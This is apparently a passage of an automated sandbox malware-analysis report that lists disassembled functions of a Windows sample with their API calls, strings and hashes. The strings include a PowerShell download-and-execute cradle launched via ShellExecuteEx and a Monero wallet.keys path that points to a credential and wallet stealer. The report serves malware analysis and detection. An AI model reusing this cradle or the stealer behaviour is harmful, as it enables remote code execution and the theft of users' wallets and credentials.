                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: d469150a885f5758535bb1f06ebff7204071d8f728ae56ab8ae1fcd2decb7cb5
                                • Instruction ID: 1f30b8280f0454ec13698318f5912a95f4cd84a8475a2a31fdf9e71a4e31c161
                                • Opcode Fuzzy Hash: d469150a885f5758535bb1f06ebff7204071d8f728ae56ab8ae1fcd2decb7cb5
                                • Instruction Fuzzy Hash: 8421D8719102189BDB28DB54DC85FE9B3B8FF48714F00C5A9A609A6240DF71AA86CF94
                                Function 00ED7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED76A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED76AB
                                • RegOpenKeyExA.ADVAPI32(80000002,00D9C240,00000000,00020119,00000000), ref: 00ED76DD
                                • RegQueryValueExA.ADVAPI32(00000000,00DADFE0,00000000,00000000,?,000000FF), ref: 00ED76FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED7708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 463a96727aade57d46f893fc228c4c546abb4c0d58907463fa9fee4c0c51fddb
                                • Instruction ID: e95e91f12d8f4b80f493a897c718a58cae7301bb071f8b5406e96513ebadd37b
                                • Opcode Fuzzy Hash: 463a96727aade57d46f893fc228c4c546abb4c0d58907463fa9fee4c0c51fddb
                                • Instruction Fuzzy Hash: 3E01A7B5E04308BBD715DBE0E849F6D77B8EF44701F008466FA55E7284E6B19A418B50
                                Function 00ED7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED773B
                                • RegOpenKeyExA.ADVAPI32(80000002,00D9C240,00000000,00020119,00ED76B9), ref: 00ED775B
                                • RegQueryValueExA.ADVAPI32(00ED76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00ED777A
                                • RegCloseKey.ADVAPI32(00ED76B9), ref: 00ED7784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: ab3af2797519bf53bdce18ad1d678cc985f17d04c0ec953636f3428ada1f4a63
                                • Instruction ID: 0f6a2d75102a596dbebcff11b4c1586a78c404b8229c287fed79e271bb69bf0c
                                • Opcode Fuzzy Hash: ab3af2797519bf53bdce18ad1d678cc985f17d04c0ec953636f3428ada1f4a63
                                • Instruction Fuzzy Hash: 2601A2B5E00308BFDB14DBE0EC4AFAEB7B8EF48701F004069FA15A7284DAB05A408B50
                                Function 00ED92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00ED3AEE,?), ref: 00ED92FC
                                • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00ED9319
                                • CloseHandle.KERNEL32(000000FF), ref: 00ED9327
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID: :$:
                                • API String ID: 1378416451-4250114551
                                • Opcode ID: 77c3470e8d95865ed2d1273b42ba8f402b942f714604464f4f0f141bfa4e0e62
                                • Instruction ID: 99b3ab7073d0ad9bd7a3480797bce46b3916cf0ec6737862596f18d87c9d5eef
                                • Opcode Fuzzy Hash: 77c3470e8d95865ed2d1273b42ba8f402b942f714604464f4f0f141bfa4e0e62
                                • Instruction Fuzzy Hash: 6DF04F35E40308BBDB28DFB0EC49F9E77B9EB48710F10C264B661B72C4D6B196418B40
                                Function 00EC99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                • LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: fbceede4ac0bdb590a548c82022359260f1ecd01f52aaab821974250b56f62ee
                                • Instruction ID: 1446f85f935beb32de28f18bf6ff20a7cae8799242e9a3f85809e8b564603437
                                • Opcode Fuzzy Hash: fbceede4ac0bdb590a548c82022359260f1ecd01f52aaab821974250b56f62ee
                                • Instruction Fuzzy Hash: BF312A74E00209EFDB24CF94D989FAE77B5FF48304F108158E911A7290D775AA82CFA0
                                Function 00ED4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,00DAE0D0), ref: 00ED47DB
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4801
                                • lstrcat.KERNEL32(?,?), ref: 00ED4820
                                • lstrcat.KERNEL32(?,?), ref: 00ED4834
                                • lstrcat.KERNEL32(?,00D9B828), ref: 00ED4847
                                • lstrcat.KERNEL32(?,?), ref: 00ED485B
                                • lstrcat.KERNEL32(?,00DAD770), ref: 00ED486F
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00ED8D90: GetFileAttributesA.KERNEL32(00000000,?,00EC1B54,?,?,00EE564C,?,?,00EE0E1F), ref: 00ED8D9F
                                  • Part of subcall function 00ED4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00ED4580
                                  • Part of subcall function 00ED4570: RtlAllocateHeap.NTDLL(00000000), ref: 00ED4587
                                  • Part of subcall function 00ED4570: wsprintfA.USER32 ref: 00ED45A6
                                  • Part of subcall function 00ED4570: FindFirstFileA.KERNEL32(?,?), ref: 00ED45BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: ff8a8fae72074a3e8666bb188684ad795a7241183cb3d977d7c81218f52d11b2
                                • Instruction ID: 3199a661e540aa8da9a41e30de25da32e67157bb77bd990dbbbbe35ce61993b4
                                • Opcode Fuzzy Hash: ff8a8fae72074a3e8666bb188684ad795a7241183cb3d977d7c81218f52d11b2
                                • Instruction Fuzzy Hash: 3E3182B690031857CB25F7A0DC85EED73BCBB58300F40559AB359A6181EEB0D7CACB91
                                Function 00ED2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED2D85
                                Strings
                                • ')", xrefs: 00ED2CB3
                                • <, xrefs: 00ED2D39
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00ED2D04
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00ED2CC4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 0eb79d3f6723788b916a3843c3e357e7edb96dfe720696aadbb291452554af70
                                • Instruction ID: 84b794e73488781468c7c111b019136475ef88fb40e4fed276abdbf3786c8887
                                • Opcode Fuzzy Hash: 0eb79d3f6723788b916a3843c3e357e7edb96dfe720696aadbb291452554af70
                                • Instruction Fuzzy Hash: 2841DC71C002489ADB18EBA0D895BEDB7B4EF10300F44512AE516B6291EF742B8BDF95
                                Function 00EC9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                Download Yara Rule
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00EC9F41
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: d2dd673fe85a03deef686a9ea220c814166c10460c8fe28d128779a948ba2109
                                • Instruction ID: 5b0b3c7a5ae89631ec78b0a31a22998e85df8962f60ffee03f5064a74a9a2a33
                                • Opcode Fuzzy Hash: d2dd673fe85a03deef686a9ea220c814166c10460c8fe28d128779a948ba2109
                                • Instruction Fuzzy Hash: DF615F31A1024C9FDB24EFA4CD96FED77B5AF44344F049129F90A6B281DBB06B46CB51
                                Function 00ED40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,00DAD950,00000000,00020119,?), ref: 00ED40F4
                                • RegQueryValueExA.ADVAPI32(?,00DAE328,00000000,00000000,00000000,000000FF), ref: 00ED4118
                                • RegCloseKey.ADVAPI32(?), ref: 00ED4122
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4147
                                • lstrcat.KERNEL32(?,00DAE178), ref: 00ED415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: a046fdb63e412b8f0fbe5af9f619a59d11eb4fc045440a6fc354d0479dbc0340
                                • Instruction ID: 4653ba3682d7714859aa34de1a53eb740e2d19298504ee33e7183627950c4efd
                                • Opcode Fuzzy Hash: a046fdb63e412b8f0fbe5af9f619a59d11eb4fc045440a6fc354d0479dbc0340
                                • Instruction Fuzzy Hash: BA419CB6D0020867DB29EBB0EC46FEE737DAB48300F00455DB62557185EAB59BC98BD1
                                Function 00ED6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00ED696C
                                • sscanf.NTDLL ref: 00ED6999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00ED69B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00ED69C0
                                • ExitProcess.KERNEL32 ref: 00ED69DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 9f8665494cc0dc38a0593c4f793506ed7956c79d4557125eb3b7ead11abe8e88
                                • Instruction ID: ea42297eb98378be1c3b73732eb9733252b4062d175a8ae2cb366d377da38f83
                                • Opcode Fuzzy Hash: 9f8665494cc0dc38a0593c4f793506ed7956c79d4557125eb3b7ead11abe8e88
                                • Instruction Fuzzy Hash: 4221EB75D00208ABCF09EFE4E945AEEB7B9FF48300F04852AE416F3244EB745605CB69
                                Function 00ED7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                Download Yara Rule
                                APIs
